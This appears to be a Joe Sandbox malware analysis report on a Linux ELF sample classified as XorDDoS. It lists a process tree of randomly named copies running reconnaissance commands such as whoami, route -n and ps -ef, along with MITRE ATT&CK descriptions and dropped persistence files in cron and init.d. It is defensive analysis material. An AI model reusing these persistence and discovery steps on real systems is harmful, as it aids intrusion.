Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6632, Parent PID: 6631

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6632, Parent PID: 1860

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	/usr/bin/bbdupdfrbl who 6261
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6638, Parent PID: 6632

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	-
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6633, Parent PID: 6261

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6634, Parent PID: 6633

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6634, Parent PID: 6633

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	/usr/bin/bbdupdfrbl "echo \"find\"" 6261
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6641, Parent PID: 6634

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	-
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6636, Parent PID: 6261

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6637, Parent PID: 6636

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6637, Parent PID: 1860

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	/usr/bin/bbdupdfrbl whoami 6261
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6642, Parent PID: 6637

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	-
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6639, Parent PID: 6261

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6640, Parent PID: 6639

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6640, Parent PID: 1860

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	/usr/bin/bbdupdfrbl "route -n" 6261
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6643, Parent PID: 6640

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	-
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6646, Parent PID: 6261

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6647, Parent PID: 6646

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: lqmgtequuz PID: 6647, Parent PID: 1860

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	/usr/bin/lqmgtequuz su 6261
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: lqmgtequuz PID: 6649, Parent PID: 6647

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	-
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6648, Parent PID: 6261

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6650, Parent PID: 6648

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: lqmgtequuz PID: 6650, Parent PID: 1860

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	/usr/bin/lqmgtequuz "ls -la" 6261
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: lqmgtequuz PID: 6653, Parent PID: 6650

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	-
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6651, Parent PID: 6261

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6652, Parent PID: 6651

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: lqmgtequuz PID: 6652, Parent PID: 1860

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	/usr/bin/lqmgtequuz "grep \"A\"" 6261
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: lqmgtequuz PID: 6659, Parent PID: 6652

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	-
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6654, Parent PID: 6261

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6655, Parent PID: 6654

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: lqmgtequuz PID: 6655, Parent PID: 1860

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	/usr/bin/lqmgtequuz "ps -ef" 6261
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: lqmgtequuz PID: 6658, Parent PID: 6655

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	-
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6656, Parent PID: 6261

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6657, Parent PID: 6656

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: lqmgtequuz PID: 6657, Parent PID: 1860

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	/usr/bin/lqmgtequuz "echo \"find\"" 6261
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: lqmgtequuz PID: 6660, Parent PID: 6657

General

Start time (UTC):	14:29:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/lqmgtequuz
Arguments:	-
File size:	548660 bytes
MD5 hash:	89dc58010dc1112c748954232f0e45bc

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6665, Parent PID: 6261

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6666, Parent PID: 6665

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vzezokfask PID: 6666, Parent PID: 6665

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	/usr/bin/vzezokfask "echo \"find\"" 6261
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: vzezokfask PID: 6670, Parent PID: 6666

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	-
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6667, Parent PID: 6261

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6668, Parent PID: 6667

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vzezokfask PID: 6668, Parent PID: 1860

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	/usr/bin/vzezokfask sh 6261
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: vzezokfask PID: 6675, Parent PID: 6668

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	-
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6669, Parent PID: 6261

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6671, Parent PID: 6669

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vzezokfask PID: 6671, Parent PID: 1860

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	/usr/bin/vzezokfask "ifconfig eth0" 6261
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: vzezokfask PID: 6677, Parent PID: 6671

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	-
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6672, Parent PID: 6261

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6673, Parent PID: 6672

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vzezokfask PID: 6673, Parent PID: 1860

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	/usr/bin/vzezokfask ls 6261
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: vzezokfask PID: 6678, Parent PID: 6673

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	-
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6674, Parent PID: 6261

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6676, Parent PID: 6674

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vzezokfask PID: 6676, Parent PID: 1860

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	/usr/bin/vzezokfask "ps -ef" 6261
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: vzezokfask PID: 6679, Parent PID: 6676

General

Start time (UTC):	14:29:48
Start date (UTC):	03/01/2025
Path:	/usr/bin/vzezokfask
Arguments:	-
File size:	548660 bytes
MD5 hash:	41de595dc0b051eb3e53023ef6d8b788

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6682, Parent PID: 6261

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6683, Parent PID: 6682

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: skjzlhozvl PID: 6683, Parent PID: 6682

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	/usr/bin/skjzlhozvl "route -n" 6261
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: skjzlhozvl PID: 6688, Parent PID: 6683

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	-
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6684, Parent PID: 6261

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6685, Parent PID: 6684

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: skjzlhozvl PID: 6685, Parent PID: 1860

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	/usr/bin/skjzlhozvl who 6261
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: skjzlhozvl PID: 6693, Parent PID: 6685

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	-
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6686, Parent PID: 6261

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6687, Parent PID: 6686

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: skjzlhozvl PID: 6687, Parent PID: 1860

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	/usr/bin/skjzlhozvl "route -n" 6261
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: skjzlhozvl PID: 6694, Parent PID: 6687

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	-
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6689, Parent PID: 6261

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6690, Parent PID: 6689

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: skjzlhozvl PID: 6690, Parent PID: 1860

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	/usr/bin/skjzlhozvl uptime 6261
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: skjzlhozvl PID: 6695, Parent PID: 6690

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	-
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6691, Parent PID: 6261

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6692, Parent PID: 6691

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: skjzlhozvl PID: 6692, Parent PID: 1860

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	/usr/bin/skjzlhozvl uptime 6261
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: skjzlhozvl PID: 6696, Parent PID: 6692

General

Start time (UTC):	14:29:53
Start date (UTC):	03/01/2025
Path:	/usr/bin/skjzlhozvl
Arguments:	-
File size:	548660 bytes
MD5 hash:	4d269bc77499545c56e853c6f0db0bb4

Chronological Activities

Analysis Process: systemd PID: 6273, Parent PID: 6272

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6273, Parent PID: 6272

General

Start time (UTC):	14:27:53
Start date (UTC):	03/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report UDMp3dZ7nc.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: XorDDoS

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/cron.hourly/gcc.sh

/etc/crontab

/etc/init.d/UDMp3dZ7nc.elf

/memfd:snapd-env-generator (deleted)

/run/gcc.pid

/usr/bin/bgoiqqymph

/usr/bin/dthtwwmqvu

/usr/bin/eqoogeqyds

/usr/bin/gphlkawhxw

/usr/bin/jeyjdycnpv

/usr/bin/ksagqhmoao

/usr/bin/oigyzaiygp

/usr/bin/otlzwyqefc

/usr/bin/qxzsiorokf

/usr/bin/snluqxjnyb

/usr/bin/sosfbbrzmx

/usr/bin/uhjkqkcgma

/usr/bin/uzqdvpyngy
